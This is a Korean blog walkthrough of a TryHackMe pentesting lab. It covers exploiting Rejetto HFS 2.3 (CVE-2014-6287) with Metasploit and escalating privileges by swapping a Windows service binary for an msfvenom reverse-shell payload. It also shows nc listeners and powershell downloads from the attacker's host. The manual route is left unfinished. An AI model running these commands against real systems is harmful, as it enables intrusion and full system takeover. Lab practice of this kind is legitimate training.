TASK 1
nmap
80번 포트 열린 것 확인, 웹 페이지 접속
이름 확인.
TASK 2 Initial Access
80 이외에 8080도 웹 서버 실행하고 있음
해당 웹서버는 Rejetto Http File Server임
2.3 버전에 CVE-2014-6287 취약점이 존재한다. (링크)
간단히 설명하자면, 검색 기능에서 %00를 이용하여 임의 프로그램을 실행할 수 있는 취약점임.
metasploit 통해 exploit 해보자.
1. 모듈
2.
use exploit/windows/http/rejetto_hfs_exec
show options
# 필수 옵션 셋팅
set RHOSTS {target ip}
set RPORT {tartget port}
set SRVHOST 0.0.0.0
set SRVPORT 8080
set LHOSTS
exploit
meterpreter > shellshell 진입 후 플래그 확인 가능 (위치는 알아서 찾을 것)
TASK 3 Privilege Escalation
권한상승을 위해 사용할 스크립트는 PowerUp.ps1 (링크)
*PowerUp : Clearing house of common privilege escalation checks, along with some weaponization vectors.
1. 해당 스크립트 다운로드 후 업로드
metepreter > upload /root/PowerUp.ps1
2. 스크립트를 실행하기 위해 powershell 환경으로 진입
load powershell
powershell_shell
3. PowerUp
PS > . .\PowerUp.ps1
PS > Invoke-Allchecks
# 모듈에 포함된 모든 검사 실행
출력된 결과에서 CanRestart가 true인 서비스를 찾아야 함.
"서비스를 다시 시작할 수 있는가?" 를 나타내는데, 변경사항을 적용하여 권한을 상승시키기 위해 꼭 필요함.
→ AdvancedSystemCareService9
*정상적인 응용 프로그램을 악성 프로그램으로 교체하고 서비스를 재식하여 악성 프로그램을 실행하기 위함
*참고: https://blog.certcube.com/powerup-cheatsheet/
4. msfvenom
msfvenom을 사용하여 악성 프로그램를 생성 → reverse shell
* meterpreter shell이 아닌, msf shell에서 실행
msfvenom -p windows/shell_reverse_tcp LHOST={local ip} LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
# -p : 페이로드
# -e : 인코딩 방식
# -f : 출력 파일 포맷
# -o : 저장할 파일 이름
5. 업로드
1) AdvancedSystemCareService9 서비스로 위장하기 위해, 우선 해당 서비스를 종료한다.
meterpreter > shell
sc stop AdvancedSystemCareService9
2) 그리고 해당 서비스의 프로그램으로 위장(PowerUp 결과로 확인가능)
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
meterpreter > upload /root/Advanced.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
3) nc 리스닝
nc -lvnp 4443
4) 서비스 재시작
meterpreter > shell
sc start AdvancedSystemCareService9
6. 플래그
C:\Users\Administrator\Desktop\root.txt
TASK 4
메타스플로잇을 사용하지 않고 Initial Access & Privilege Escalation
0. 준비
- nc 파일 다운받기 (링크)
- winPEAS 다운받기 (링크)
1. exploit-db에서 스크립트 다운로드 (링크)
2. 스크립트 수정
ip_addr, local_port, vbs
3. 웹 서버 실행
python3 -m http.server 8888익스플로잇 실행하면서 타겟이 nc.exe , winPEAS.exe 다운받도록 함
4. nc로 리스닝
nc -lvnp 443
5. 익스플로잇
python2 exploit.py {target ip} {target port}
6. winPEAS.exe를 다운받고, 침투한 시스템이 해당 파일을 가져가도록 powershell -c 사용 (링크)
*Windows OS에서 권한 상승 취약점을 찾는 데 도움이 되는 스크립트로, 사용 가능한 권한 상승 경로를 찾을 수 있음
powershell -c wget "http://10.10.182.98:8888/winPEASx64.exe" -outfile "winPEASx64.exe"*powershell -c : cmd에서 powershell 명령어 사용 가능
*powershell -c Get-Service # 실행 중인 모든 서비스 출력
7. 실행
...
어택박스가 종료되어 버려서 여기까지 하겠음.
이후 동일하게 msfvenom로 악성 프로그램 생성한뒤 powershell로 가져오고, 권한 상승하면 된다고 한다.
'System > 침투' 카테고리의 다른 글
| THM Offensive Pentesting - HackPack (0) | 2023.07.19 |
|---|---|
| THM Offensive Pentesting - Alfred (3) | 2023.07.18 |
| THM Offensive Pentesting - Kenobi (1) | 2023.07.17 |
| THM Offensive Pentesting - Blue (0) | 2023.06.17 |
| THM Offensive Pentesting - Vulnversity (0) | 2023.06.08 |